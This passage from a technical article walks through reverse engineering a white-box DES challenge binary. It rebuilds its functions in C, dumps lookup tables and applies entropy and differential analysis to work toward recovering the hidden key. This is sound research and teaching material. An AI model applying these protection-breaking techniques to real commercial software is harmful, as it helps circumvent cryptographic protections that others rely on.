{
|
|
char c;
|
|
c = argv[1+i][0];
|
|
|
|
if(c <= '9')
|
|
{
|
|
c -= '0'; // 0x30 = integer offset in ASCII table
|
|
in[i] = (c<<4);
|
|
}
|
|
else
|
|
{
|
|
c -= ('a' - 10);
|
|
in[i] = (c<<4);
|
|
}
|
|
|
|
c = argv[1+i][1];
|
|
|
|
if(c <= '9')
|
|
{
|
|
c -= '0'; // 0x30 = integer offset in ASCII table
|
|
in[i] ^= c;
|
|
}
|
|
else
|
|
{
|
|
c -= ('a' - 10);
|
|
in[i] ^= c;
|
|
}
|
|
i++;
|
|
}
|
|
return;
|
|
}
|
|
---------------------------------------------------------------------------
|
|
|
|
Once the job is done, an 8 bytes buffer (in[8], the plaintext) is
|
|
built. This is where serious business begins. Thanks to the Control Flow
|
|
Graph provided by your favorite disassembler, you will quickly identify 3
|
|
pseudo functions* :
|
|
|
|
- wb_init(): 0x0804863F to 0x08048C1D
|
|
|
|
This code takes an 8 bytes buffer, returns 1 byte and is called 12
|
|
times by main(). Thanks to this, a 12 x 8 = 96 bits buffer is built.
|
|
As said earlier, the WB is operating on 96 bits states so this is
|
|
most likely the initialization function.
|
|
|
|
- wb_round(): 0x08048C65 to 0x08049731
|
|
|
|
This code takes the 12 bytes buffer generated by wb_init() as input
|
|
and modifies it. The function is called 16 times by main(). Because
|
|
16 is exactly the number of DES rounds, assuming it is the round
|
|
function seems fair.
|
|
|
|
- wb_final(): 0x08049765 to 0x08049E67
|
|
|
|
This code takes the last buffer returned by wb_round() as input and
|
|
returns an 8 bytes buffer which is printed on the screen. So we can
|
|
assume that this is the termination function in charge of building
|
|
the DES ciphertext out of the last internal state.
|
|
|
|
*: There is no 'function' in this program, probably because of an inlining,
|
|
but we can still distinguish logical parts.
|
|
|
|
You may argue that attributing roles to wb_init, wb_round and wb_final
|
|
is a bit hasty but there is something interesting in the code: symbols! In
|
|
each of these functions, an array of lookup tables is used and named
|
|
'Initialize', 'RoundAffineNetwork' and 'FinalRoundNetwork' in the
|
|
corresponding functions. Convenient isn't it?
|
|
|
|
Usually in commercial protections, engineers will take care of little
|
|
details such as this and try to avoid leaking any information. In this case
|
|
however, it can be assumed that the focus is on the cryptography as there
|
|
are neither anti-debugs nor anti-disassembling protections so it should be
|
|
safe to trust our intuition.
|
|
|
|
Thanks to this first reverse engineering step, we're able to rewrite
|
|
a similar main function:
|
|
|
|
-------------------------------- wb_main.c --------------------------------
|
|
unsigned char in[8]; // ebp-1Ch
|
|
unsigned char out[12]; // ebp-28h
|
|
unsigned char temp[12]; // ebp-34h
|
|
|
|
[...]
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
if( argc != 9)
|
|
{
|
|
printf(usage, argv[0], argv[0]);
|
|
return 0;
|
|
}
|
|
|
|
/* Fill the in buffer */
|
|
|
|
convert_args(argv);
|
|
|
|
/* and print it :) */
|
|
|
|
printf("\nINPUT: ");
|
|
for(j=0; j<8; j++)
|
|
printf("%02x ", in[j]);
|
|
|
|
/* WB initialisation */
|
|
|
|
for(j=0; j<12; j++)
|
|
wb_init(j);
|
|
|
|
round_nbr = 0;
|
|
for(round_nbr=0; round_nbr<15; round_nbr++)
|
|
{
|
|
memcpy(temp, out, 12);
|
|
wb_round();
|
|
}
|
|
|
|
/* Building the final buffer */
|
|
|
|
printf("\nOUTPUT: ");
|
|
for(j=0; j<8; j++)
|
|
wb_final(j);
|
|
|
|
printf("\n");
|
|
return 0;
|
|
}
|
|
-------------------------------- wb_main.c --------------------------------
|
|
|
|
One hint to speed up things: always focus first on the size and nature
|
|
of buffers transmitted to the different sub-functions.
|
|
|
|
|
|
Reversing wb_init()
|
|
-------------------
|
|
|
|
|
|
It is now time to have a look at the first function. Again I won't
|
|
detail the whole reverse engineering but rather give you a few
|
|
explanations:
|
|
|
|
- Whenever the function is called, it uses a set of 15 lookup tables
|
|
whose addresses are dependent of both the index in the output array
|
|
and the index of the box itself (amongst the 15 used by the
|
|
function).
|
|
|
|
This means that the sets of tables used to calculate OUT[x] and
|
|
OUT[y] when x!=y are (likely to be) different and for a same OUT[x],
|
|
different tables will be applied to IN[a] and IN[b] if a!=b.
|
|
|
|
- All of these lookup tables are located at:
|
|
|
|
Initialize + 256*idx_box + OUT_idx*0xF00
|
|
where:
|
|
> idx_box is the index of the box amongst the 15
|
|
> OUT_idx is the index in the output array (OUT)
|
|
|
|
- The tables are static. Thanks to this property we can dump them
|
|
whenever we want. I chose to write a little GDB script (available in
|
|
appendix) to perform this task. The export is an array of lookup
|
|
tables (iBOX_i) written in C language.
|
|
|
|
- wb_init() is performing operations on nibbles (4 bits) so for a
|
|
particular output byte (OUT[m]), the generation of the 4 least
|
|
significant bits is independent of the generation of the 4 most
|
|
significant ones.
|
|
|
|
Now with this information in mind, let's have a look at the reversed
|
|
wb_init() function:
|
|
|
|
-------------------------------- wb_init.c --------------------------------
|
|
unsigned char p[8];
|
|
|
|
inline void wb_init(
|
|
int m // ebp-48h
|
|
)
|
|
{
|
|
unsigned int temp0; // ebp-228h
|
|
unsigned int temp1; // ebp-224h
|
|
[...]
|
|
unsigned int temp23; // ebp-1CCh
|
|
|
|
unsigned int eax,ebx,ecx,edx,edi,esi;
|
|
|
|
bzero(p,sizeof p);
|
|
p[0] = iBOX_0[m][in[0]];
|
|
p[1] = iBOX_1[m][in[1]];
|
|
p[2] = iBOX_2[m][in[2]];
|
|
p[3] = iBOX_3[m][in[3]];
|
|
p[4] = iBOX_4[m][in[4]];
|
|
p[5] = iBOX_5[m][in[5]];
|
|
p[6] = iBOX_6[m][in[6]];
|
|
p[7] = iBOX_7[m][in[7]];
|
|
|
|
// First nibble
|
|
|
|
ecx = (0xF0 & p[0]) ^ ( p[1] >> 4 );
|
|
temp3 = 0xF0 & iBOX_8[m][ecx];
|
|
|
|
ecx = (0xF0 & p[2]) ^ ( p[3] >> 4 );
|
|
eax = iBOX_9[m][ecx] >> 4;
|
|
ecx = temp3 ^ eax;
|
|
temp6 = 0xF0 & iBOX_12[m][ecx];
|
|
|
|
ecx = (0xF0 & p[4]) ^ ( p[5] >> 4 );
|
|
eax = iBOX_10[m][ecx] >> 4;
|
|
ecx = temp6 ^ eax;
|
|
edi = 0xF0 & iBOX_13[m][ecx];
|
|
|
|
ecx = (0xF0 & p[6]) ^ ( p[7] >> 4 );
|
|
eax = iBOX_11[m][ecx] >> 4;
|
|
ecx = edi ^ eax;
|
|
edx = iBOX_14[m][ecx];
|
|
esi = edx & 0xFFFFFFF0;
|
|
|
|
// Second nibble
|
|
|
|
ecx = (0x0F & p[1]) ^ (0xF0 & ( p[0] << 4 ));
|
|
temp15 = 0xF0 & ( iBOX_8[m][ecx] << 4);
|
|
|
|
ecx = (0x0F & p[3]) ^ (0xF0 & ( p[2] << 4 ));
|
|
eax = 0x0F & ( iBOX_9[m][ecx] );
|
|
ecx = temp15 ^ eax;
|
|
temp18 = 0xF0 & ( iBOX_12[m][ecx] << 4 );
|
|
|
|
ecx = (0x0F & p[5]) ^ (0xF0 & ( p[4] << 4 ));
|
|
eax = 0x0F & iBOX_10[m][ecx];
|
|
ecx = temp18 ^ eax;
|
|
temp21 = 0xF0 & (iBOX_13[m][ecx] << 4);
|
|
|
|
ecx = (0x0F & p[7]) ^ (0xF0 & ( p[6] << 4 ));
|
|
eax = 0x0F & ( iBOX_11[m][ecx] );
|
|
ecx = temp21 ^ eax;
|
|
eax = 0x0F & ( iBOX_14[m][ecx] );
|
|
|
|
// Output is the combination of both nibbles
|
|
|
|
eax = eax ^ esi;
|
|
out[m] = (char)eax;
|
|
return;
|
|
}
|
|
-------------------------------- wb_init.c --------------------------------
|
|
|
|
In a nutshell:
|
|
- & (AND) and >>/<< (SHIFTS) are used to operate on nibbles
|
|
- ^ (XOR) are used to concatenate nibbles in order to build the
|
|
entries (which are bytes) of the iBOX_i lookup tables
|
|
- The output byte out[m] is the concatenation of two independently
|
|
calculated nibbles
|
|
|
|
To understand exactly what's going on, a drawing is much clearer. So
|
|
thanks to asciio [R11] this gives us something like this:
|
|
|
|
|
|
******** ******** ******** ******** ******** ******** ******** ********
|
|
* IN_0 * * IN_1 * * IN_2 * * IN_3 * * IN_4 * * IN_5 * * IN_6 * * IN_7 *
|
|
******** ******** ******** ******** ******** ******** ******** ********
|
|
|
|
| | | | | | | |
|
|
H | H | H | H | H | H | H | H |
|
|
v v v v v v v v
|
|
|
|
<----------------------------- 8x8 = 64 bits --------------------------->
|
|
|
|
.-------..-------. .-------..-------. .-------..-------. .-------..-------.
|
|
\iBox_0 /\iBox_1 / \iBox_2 /\iBox_3 / \iBox_4 /\iBox_5 / \iBox_6 /\iBox_7 /
|
|
'-----' '-----' '-----' '-----' '-----' '-----' '-----' '-----'
|
|
|
|
<----------------------------- 8x4 = 32 bits ------------------------->
|
|
|
|
\ / \ / \ / \ /
|
|
H \ / H H \ / H H \ / H H \ / H
|
|
v v v v v v v v
|
|
.---------. .---------. .---------. .---------.
|
|
\ iBox_8 / \ iBox_9 / \ iBox_10 / \ iBox_11 /
|
|
'-------' '-------' '-------' '-------'
|
|
|
|
<------------------------- 4x4 = 16 bits ---------------------->
|
|
|
|
\ / \ /
|
|
H \ / H H \ / H
|
|
\ / \ /
|
|
v v v v
|
|
.---------. .---------.
|
|
\ iBox_12 / \ iBox_13 /
|
|
'-------' '-------'
|
|
|
|
<--------------- 2x4 = 8 bits ----------->
|
|
|
|
\ /
|
|
\ H H /
|
|
'---------. .---------'
|
|
| |
|
|
v v
|
|
.---------.
|
|
\ iBox_14 /
|
|
'-------'
|
|
|
|
<- 1x4 bits ->
|
|
|
|
\
|
|
H \ 8 bits
|
|
\ <--------->
|
|
Concatenation '---> ***********
|
|
of nibbles * OUT_x *
|
|
.---> ***********
|
|
/
|
|
L /
|
|
/
|
|
|
|
<- 1x4 bits ->
|
|
|
|
.-------.
|
|
/ iBox_14 \
|
|
'---------'
|
|
^ ^
|
|
L | | L
|
|
.--------' '--------.
|
|
/ \
|
|
/ \
|
|
|
|
<--------------- 2x4 = 8 bits ----------->
|
|
|
|
.-------. .-------.
|
|
/ iBox_12 \ / iBox_13 \
|
|
'---------' '---------'
|
|
|
|
^ ^ ^ ^
|
|
/ \ / \
|
|
L / \ L L / \ L
|
|
/ \ / \
|
|
|
|
<------------------------- 4x4 = 16 bits ---------------------->
|
|
|
|
.-------. .-------. .-------. .-------.
|
|
/ iBox_8 \ / iBox_9 \ / iBox_10 \ / iBox_11 \
|
|
'---------' '---------' '---------' '---------'
|
|
|
|
^ ^ ^ ^ ^ ^ ^ ^
|
|
L / \ L L / \ L L / \ L L / \ L
|
|
/ \ / \ / \ / \
|
|
|
|
<----------------------------- 8x4 = 32 bits ------------------------->
|
|
|
|
.-----. .-----. .-----. .-----. .-----. .-----. .-----. .-----.
|
|
/iBox_0 \/iBox_1 \ /iBox_2 \/iBox_3 \ /iBox_4 \/iBox_5 \ /iBox_6 \/iBox_7 \
|
|
'-------''-------' '-------''-------' '-------''-------' '-------''-------'
|
|
|
|
<----------------------------- 8x8 = 64 bits --------------------------->
|
|
|
|
^ ^ ^ ^ ^ ^ ^ ^
|
|
L | L | L | L | L | L | L | L |
|
|
| | | | | | | |
|
|
|
|
******** ******** ******** ******** ******** ******** ******** ********
|
|
* IN_0 * * IN_1 * * IN_2 * * IN_3 * * IN_4 * * IN_5 * * IN_6 * * IN_7 *
|
|
******** ******** ******** ******** ******** ******** ******** ********
|
|
|
|
In this case, 'H' is used as a suffix to identify the most significant
|
|
(High) nibble of a particular byte. As you can see, the input (respectively
|
|
the output) is not an 8 (respectively 12) _bytes_ array but rather a 16
|
|
(respectively 24) _nibbles_ array. Indeed, each byte array (iBox_i) stores
|
|
exactly 2 lookup tables. We say that such lookup tables are 'compacted',
|
|
see [R14] for additional details.
|
|
|
|
|
|
Global description
|
|
-------------------
|
|
|
|
|
|
Good news guys, the wb_init(), wb_round() and wb_final() functions are
|
|
composed of the same nibble oriented patterns. So basically wb_round() and
|
|
wb_final() also contain ATs applied to a nibble array, and the end of the
|
|
reverse engineering is quite straightforward.
|
|
|
|
Remark: Manipulating nibbles implies that the internal encoding is
|
|
performed using 4 bits to 4 bits bijections.
|
|
|
|
Again thanks to asciio, we're able to draw something like that:
|
|
|
|
|
|
8 x (2x4) = 64 bits
|
|
<---------------------------------->
|
|
|
|
2x4 = 8 bits
|
|
<---->
|
|
|
|
.----------------------------------. .-----------.
|
|
| .-----. .-----. .-----. | | INPUT |
|
|
.----| IN0 | | IN1 | ... | IN7 | | '-----------'
|
|
| | '-----' '-----' '-----' | |
|
|
v '------------|----------------|----' v
|
|
| v | .------------.
|
|
|--------<---------------<-------' ( wb_init func )
|
|
| '------------'
|
|
.-----v---------------------------------------------. |
|
|
|.--------. .--------. .---------.| |
|
|
|| STG0_0 | | STG0_1 | ... | STG0_11 || |
|
|
|'--------' '--------' '---------'| |
|
|
'-----|---------|-----------------------------|-----' |
|
|
| | | v
|
|
| v | .-------------.
|
|
| | | ( wb_round func )
|
|
'--->-----|-------<---------------------' '-------------'
|
|
| |
|
|
.---------------|------------------------------------. |
|
|
|.--------. .---v----. .---------.| |
|
|
|| STG1_0 | | STG1_1 | ... | STG1_11 || |
|
|
|'--------' '--------' '---------'| |
|
|
'----------------------------------------------------' |
|
|
|
|
|
2x4bits |
|
|
<--------> 12 x (2x4) = 96 bits |
|
|
<----------------------------------------------------> |
|
|
v
|
|
.-------------.
|
|
... 15x ( wb_round func )
|
|
'-------------'
|
|
.----------------------------------------------------. |
|
|
|.---------..---------. .----------.| |
|
|
|| STG14_0 || STG14_1 | ... | STG14_11 || |
|
|
|'---------''---------' '----------'| |
|
|
'-----|--------|-------------------------------|-----' v
|
|
| v | .-------------.
|
|
| | | ( wb_final func )
|
|
'----->-----<----------------------------' '-------------'
|
|
| |
|
|
.-----|----------------------------. v
|
|
|.----v-. .------. .------.| .----------.
|
|
|| OUT0 | | OUT1 | ... | OUT7 || | OUTPUT |
|
|
|'------' '------' '------'| '----------'
|
|
'----------------------------------'
|
|
|
|
2x4bits
|
|
<------>
|
|
8 x (2x4) = 64 bits
|
|
<---------------------------------->
|
|
|
|
|
|
Writing the C code corresponding to these functions is not difficult
|
|
though a bit boring (not to mention prone to mistakes). I was able to
|
|
rewrite the whole binary in a few hours (and it took me almost the same
|
|
time to make it work :O). The source code is available in the appendix.
|
|
|
|
Remark: I've not tried to use Hex-Rays on the binary but it could be
|
|
interesting to know if the decompilation is working out of the box.
|
|
|
|
It's easy to see that my source code is functionally equivalent on the
|
|
input/output behavior:
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./wbDES.orig 11 22 ff dd 00 11 26 93 <- the original
|
|
|
|
INPUT: 11 22 ff dd 00 11 26 93
|
|
OUTPUT: 04 e9 ff 8e 2e 98 6c 6b
|
|
$ make
|
|
$ ./wbdes.try 11 22 ff dd 00 11 26 93 <- my copy :)
|
|
|
|
INPUT: 11 22 ff dd 00 11 26 93
|
|
OUTPUT: 04 e9 ff 8e 2e 98 6c 6b
|
|
$
|
|
---------------------------------------------------------------------------
|
|
|
|
Now let's try to break the white-box. We will proceed in two steps
|
|
which is exactly how I handled the challenge. What is described is how I
|
|
proceeded as I wasn't following academic publications. I don't know if it's
|
|
a better approach or not. It's just my way of doing things and because I'm
|
|
not a cryptographer, it's _practical_. If you prefer more _theoretical_
|
|
solutions, please refer to [R04] for a list of papers dealing with the
|
|
subject.
|
|
|
|
|
|
----[ 6.2 - The discovery step
|
|
|
|
|
|
First of all, let's gather some information about this white-box. There
|
|
is a first immediate observation: there is no explicit T-box step which
|
|
proves that it is combined with the AT step in a same function. This is an
|
|
optimization which was historically proposed in [R14] in order to protect
|
|
the output of the T-box and, as a result, to mitigate the so-called
|
|
statistical bucketing attack described in [R09] while compressing the
|
|
implementation by merging operations.
|
|
|
|
I used this information as well as the size of the binary (which is a
|
|
bit more than the size of the lookup tables) as indicators of how recent
|
|
the design could be. I didn't have the time to read all the white-box
|
|
related papers (although there are not a thousand of them).
|
|
|
|
|
|
Analyzing the wb_init()
|
|
-----------------------
|
|
|
|
|
|
Earlier, I've made assumptions about wb_init() and wb_round() but at
|
|
this point little is really known about them. Now is the time to play a bit
|
|
with wb_init() and by playing I mean discovering the "link" between the
|
|
input (plaintext) and the input of wb_round() which will be called "stage0"
|
|
from now on.
|
|
|
|
Let's begin by a quick observation. As said before, for each output
|
|
byte of wb_init(), there is a corresponding set of 15 (condensed) iBox_i.
|
|
A simple glance at these boxes is enough to determine that for each set,
|
|
the 8 first iBox_i have a very low entropy. Conversely, the remaining 7
|
|
ones have a high entropy:
|
|
|
|
---------------------------------------------------------------------------
|
|
[...]
|
|
|
|
unsigned char iBOX_3[12][256] = {
|
|
{
|
|
0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
|
|
0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
|
|
0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
|
|
0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
|
|
0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
|
|
[...]
|
|
0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,
|
|
0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,
|
|
},
|
|
|
|
[...]
|
|
|
|
unsigned char iBOX_8[12][256] = {
|
|
{
|
|
0x13,0xdf,0xf9,0x38,0x61,0xe2,0x44,0x9e,0xc0,0x2a,0x0b,0xb7,0x7c,0xad,
|
|
0x56,0x85,0x96,0xbe,0x8b,0x04,0x27,0xcd,0xa8,0x1f,0xec,0x65,0x39,0xd1,
|
|
0x50,0x42,0x73,0xfa,0x4a,0x52,0x04,0x8b,0xcc,0x2f,0x19,0xad,0x67,0xe3,
|
|
[...]
|
|
0x8a,0x08,0xbd,0x59,0x36,0xf1,0xef,0x45,0x13,0xd4,0x90,0x67,0xae,0x76,
|
|
0x3c,0xf7,0xe4,0x65,0x91,0x43,0x2b,0xcd,0x80,0x58,0xd9,0x1a,0xbf,0x02,
|
|
},
|
|
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
The example shows us that iBOX_3[0] has only 2 possible values: 0xf7
|
|
for any index less than or equal to 127 and 0xf1 for the remaining ones.
|
|
Said otherwise, this box is a bit filter:
|
|
|
|
- High output nibble: only 1 possible value (0xf) => no bit chosen
|
|
- Low output nibble: 2 possible values (0x1, 0x7) => the input's
|
|
MSB is chosen
|
|
|
|
Let's visualize the effect of the 8 first iBox_i for every output
|
|
nibble. To see if the particular bit at position 'i' is involved in the LUT
|
|
'p', you can compute:
|
|
|
|
- p[0]&0xf0 and p[(1<<i)]&0xf0 ; influence on the High nibble
|
|
- p[0]&0x0f and p[(1<<i)]&0x0f ; influence on the Low nibble
|
|
|
|
In each case, if the bit at the position 'i' is indeed involved then
|
|
both results will be different. I implemented it in entropy.c
|
|
(see appendix):
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./entropy
|
|
|
|
[+] Link between IN and OUT arrays
|
|
OUT[0] (high) is composed of:
|
|
-> bit 6
|
|
-> bit 49
|
|
-> bit 57
|
|
-> bit 56
|
|
OUT[0] (low) is composed of:
|
|
-> bit 24
|
|
-> bit 32
|
|
-> bit 40
|
|
-> bit 48
|
|
[...]
|
|
OUT[11] (high) is composed of:
|
|
-> bit 7
|
|
-> bit 15
|
|
-> bit 23
|
|
-> bit 31
|
|
OUT[11] (low) is composed of:
|
|
-> bit 14
|
|
-> bit 22
|
|
-> bit 46
|
|
-> bit 54
|
|
[+] Total nbr of bits involved = 96
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
So the analysis of the 8 first LUT reveals that each output (OUT[i])
|
|
nibble is linked to exactly 4 input bits. So the 8 first iBox_i are no more
|
|
than an obfuscated linear mapping.
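
   For reference, the core of that test fits in a few lines of Python (p
being one of the dumped 256-entry tables, for a fixed output index m):

---------------------------------------------------------------------------
# Which input bits influence the high / low output nibble of the LUT p?

def involved_bits(p):
    high = [i for i in range(8) if (p[0] ^ p[1 << i]) & 0xF0]
    low  = [i for i in range(8) if (p[0] ^ p[1 << i]) & 0x0F]
    return high, low
---------------------------------------------------------------------------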
|
|
|
|
A good idea is to focus more specifically on the input bits frequency:
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./entropy
|
|
[...]
|
|
[+] Nbr of times a bit is used
|
|
[b_00] 2 [b_01] 1 [b_02] 2 [b_03] 1 [b_04] 2 [b_05] 1 [b_06] 2 [b_07] 1
|
|
[b_08] 2 [b_09] 1 [b_10] 2 [b_11] 1 [b_12] 2 [b_13] 1 [b_14] 2 [b_15] 1
|
|
[b_16] 2 [b_17] 1 [b_18] 2 [b_19] 1 [b_20] 2 [b_21] 1 [b_22] 2 [b_23] 1
|
|
[b_24] 2 [b_25] 1 [b_26] 2 [b_27] 1 [b_28] 2 [b_29] 1 [b_30] 2 [b_31] 1
|
|
[b_32] 2 [b_33] 1 [b_34] 2 [b_35] 1 [b_36] 2 [b_37] 1 [b_38] 2 [b_39] 1
|
|
[b_40] 2 [b_41] 1 [b_42] 2 [b_43] 1 [b_44] 2 [b_45] 1 [b_46] 2 [b_47] 1
|
|
[b_48] 2 [b_49] 1 [b_50] 2 [b_51] 1 [b_52] 2 [b_53] 1 [b_54] 2 [b_55] 1
|
|
[b_56] 2 [b_57] 1 [b_58] 2 [b_59] 1 [b_60] 2 [b_61] 1 [b_62] 2 [b_63] 1
|
|
$
|
|
---------------------------------------------------------------------------
|
|
|
|
The even bits are used exactly twice while odd ones are only used once
|
|
(here odd and even both refer to the position). Or you could say that even
|
|
bits are duplicated in the internal state built after this step.
|
|
|
|
Anybody familiar with the DES knows that the IP(X) function of the DES
|
|
gives the internal state L || R where:
|
|
|
|
- L is an array composed of the odd bits of X
|
|
- R is an array composed of the even bits of X
|
|
|
|
In an academic WB DES implementation, building the 96 bits state is
|
|
performed using the duplication of even bits (R). This is because these
|
|
bits are necessary as both input of the E-box and output of the DES round
|
|
function (see my previous description of DES). So we have an obvious match
|
|
and it's a clear indication that there is no external encoding applied to
|
|
the input (and as a consequence probably none applied to the output as
|
|
well). More precisely there could still be a bit permutation on both L & R
|
|
bits but it sounds like a silly hypothesis so let's forget about that.
|
|
What would be the point?
|
|
|
|
---
|
|
|
|
Now let's continue with the differential analysis of the full wb_init().
|
|
This step is much more intuitive. Think about it: if you want to discover
|
|
the nibbles of stage0 (the output of wb_init) influenced by a specific
|
|
input bit then apply wb_init() to two inputs whose only difference is this
|
|
bit. Then calculate the XOR of both results and the non null nibbles are
|
|
the ones which are affected. This was greatly inspired by [R09].
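
   In Python this boils down to a few lines; wb_init_full() is a
hypothetical wrapper mapping the 8-byte plaintext to the 12-byte stage0
buffer, and the bit numbering convention (MSB first inside each byte) is
an assumption that may differ from the one used by entropy.c:

---------------------------------------------------------------------------
# Differential analysis of wb_init (sketch). wb_init_full() is assumed
# to map an 8-byte input to the 12-byte stage0 output.

def diff_wb_init(bit, wb_init_full):
    ref = wb_init_full([0] * 8)                  # all-zero plaintext
    x = [0] * 8
    x[bit // 8] = 0x80 >> (bit % 8)              # flip a single input bit
    cur = wb_init_full(x)
    return [a ^ b for a, b in zip(ref, cur)]     # non null nibbles = hits
---------------------------------------------------------------------------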
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./entropy
|
|
[...]
|
|
[+] Differential cryptanalysis on wb_init()
|
|
-> b_00 :: 00 04 20 00 00 00 00 00 00 00 00 00
|
|
-> b_01 :: 00 00 00 40 00 00 00 00 00 00 00 00
|
|
-> b_02 :: 00 00 00 09 d0 00 00 00 00 00 00 00
|
|
-> b_03 :: 00 00 00 00 00 00 00 90 00 00 00 00
|
|
-> b_04 :: 00 00 00 00 00 0e 60 00 00 00 00 00
|
|
-> b_05 :: 00 00 00 00 00 00 00 00 00 50 00 00
|
|
-> b_06 :: 80 00 00 00 00 00 00 05 00 00 00 00
|
|
-> b_07 :: 00 00 00 00 00 00 00 00 00 00 00 b0
|
|
-> b_08 :: 00 07 00 00 00 00 00 00 01 00 00 00
|
|
-> b_09 :: 00 00 00 f0 00 00 00 00 00 00 00 00
|
|
-> b_10 :: 00 00 00 06 00 00 00 00 00 03 00 00
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
So for even bits there are 2 nibbles affected and only one for odd
|
|
bits. Not only does it confirm our previous hypothesis but it also reveals
|
|
the position (the index in the nibble array) of the bits in the WB internal
|
|
state (up to 1/2 probability for even bits). This is particularly
|
|
interesting when it comes to locating S-boxes for example ;-)
|
|
|
|
|
|
Analyzing the first wb_round()
|
|
------------------------------
|
|
|
|
|
|
To analyze this function, one clever trick is to make use of the odd
|
|
bits (L0) and perform a differential analysis.
|
|
|
|
Natively, the DES satisfies the following system of equations:
|
|
|
|
L1 = R0
|
|
R1 = L0 [+] f(R0,K0)
|
|
|
|
With
|
|
L0 || R0 being the result of IP(plaintext)
|
|
K0 being the first subkey
|
|
|
|
Let's now consider two plaintexts (A and B). The first one is composed
|
|
of bits all set to 0 (L0_A || R0_A) whereas the second one (L0_B || R0_B)
|
|
has a weight of 1 and more specifically, its sole bit set to 1 is in L0.
|
|
|
|
Remark: While there is only one A, there are obviously 32 possible B.
|
|
We can thus write thanks to the previous equations:
|
|
|
|
L1_A = R0_A = 0
|
|
R1_A = L0_A [+] f(R0_A,K0) = f(0,K0)
|
|
|
|
And
|
|
|
|
L1_B = R0_B = 0
|
|
R1_B = L0_B [+] f(R0_B,K0) = L0_B [+] f(0,K0)
|
|
|
|
(Again please excuse the lazy notation)
|
|
|
|
This finally gives us:
|
|
|
|
DELTA(L1||R1)(A,B) = ( L1_A [+] L1_B || R1_A [+] R1_B )
|
|
= ( 0 [+] 0 || f(0,K0) [+] L0_B [+] f(0,K0) )
|
|
= ( 0 || L0_B )
|
|
|
|
We know that L0_B's weight is 1 so in a native DES the modification of
|
|
one bit in L0 induces the modification of a unique bit in the output of the
|
|
DES round function. In an obfuscated context, this means that only one
|
|
output nibble is modified and calculating DELTA (the result of the so
|
|
called differential analysis if you prefer) is merely a trick to identify
|
|
it easily.
|
|
|
|
Now that you've grasped the main idea, let's work on the real WB. Again
|
|
consider plaintexts A and B which give (L0_A || R0_A) and (L0_B || R0_B)
|
|
after IP().
|
|
|
|
Because wb_round() includes the E-box and produces a 96 bits output
|
|
state, we now have to consider an additional transformation:
|
|
|
|
X (64b) ---> [ wb_init + first wb_round ] ----> Y (96b)
|
|
|
|
Here Y is the output of wb_round. Following the design in academic
|
|
publications we can write:
|
|
|
|
Y = RP ( L1 || X1 || r1 ) (RP = Random bit Permutation used to hide
|
|
the position of bits in the
|
|
obfuscated output.)
|
|
|
|
With:
|
|
- L1 being R0 (from DES round equation)
|
|
- X1 being the result of the E-box applied to R1
|
|
- r1 being the complementary bits such as the set of X1 and r1 is
|
|
exactly twice R1
|
|
|
|
Now let's apply again the differential analysis. It's important to
|
|
remark that RP() and E() are both linear operations as this simplifies
|
|
things. Indeed it's well known that:
|
|
|
|
LinearFunc(x [+] y) = LinearFunc(x) [+] LinearFunc(y)
|
|
|
|
Putting everything together this gives us:
|
|
|
|
     DELTA(Y)(A,B) = RP(Y_A) [+] RP(Y_B)
                   = RP(Y_A [+] Y_B)
                   = RP(L1_A [+] L1_B || X1_A [+] X1_B
                                      || r1_A [+] r1_B)
                   = RP(0 [+] 0 || E(f(0,K0)) [+] E(L0_B [+] f(0,K0))
                                || r1_A [+] r1_B)
                   = RP(0 || E(f(0,K0) [+] L0_B [+] f(0,K0))
                          || r1_A [+] r1_B)
                   = RP(0 || E(L0_B) || r1_A [+] r1_B)
|
|
|
|
   If the bit set in L0 is a middle bit then:
     - Weight(E(L0_B)) = 1 and Weight(r1_A [+] r1_B) = 1
   If the bit set in L0 isn't a middle bit then:
     - Weight(E(L0_B)) = 2 and Weight(r1_A [+] r1_B) = 0
|
|
|
|
In both cases, Weight(RP(0 || E(L0_B) || r1_A [+] r1_B)) = 2, RP having
|
|
no effect on the weight since it only permutes bits. This means that 1 bit
|
|
modification should have a visible impact on 'at most' 2 nibbles. 'at most'
|
|
and not 'exactly' because with the effect of RP() the two bits could be
|
|
located in the same nibble.
|
|
|
|
Let's see if we are right:
|
|
|
|
---------------------------------------------------------------------------
|
|
b_01 :: 00 05 d0 00 00 00 00 00 00 00 00 00 <-- 2 modified nibbles
|
|
b_03 :: 00 00 00 03 60 00 00 00 00 00 00 00 <-- 2 modified nibbles
|
|
b_05 :: 00 00 00 00 00 04 e0 00 00 00 00 00 <-- 2 modified nibbles
|
|
b_07 :: 90 00 00 00 00 00 00 08 00 00 00 00 ...
|
|
b_09 :: 00 0b 00 00 00 00 00 00 05 00 00 00
|
|
b_11 :: 00 00 00 0f 00 00 00 00 00 08 00 00
|
|
b_13 :: 00 00 00 00 00 0d 00 00 00 00 0f 00
|
|
b_15 :: 00 00 00 00 00 00 00 0f 00 00 00 06
|
|
b_17 :: 00 04 00 00 00 00 00 00 0c 00 00 00
|
|
b_19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
|
|
b_21 :: 00 00 00 00 00 08 00 00 00 00 06 00
|
|
b_23 :: 00 00 00 00 00 00 00 0d 00 00 00 08
|
|
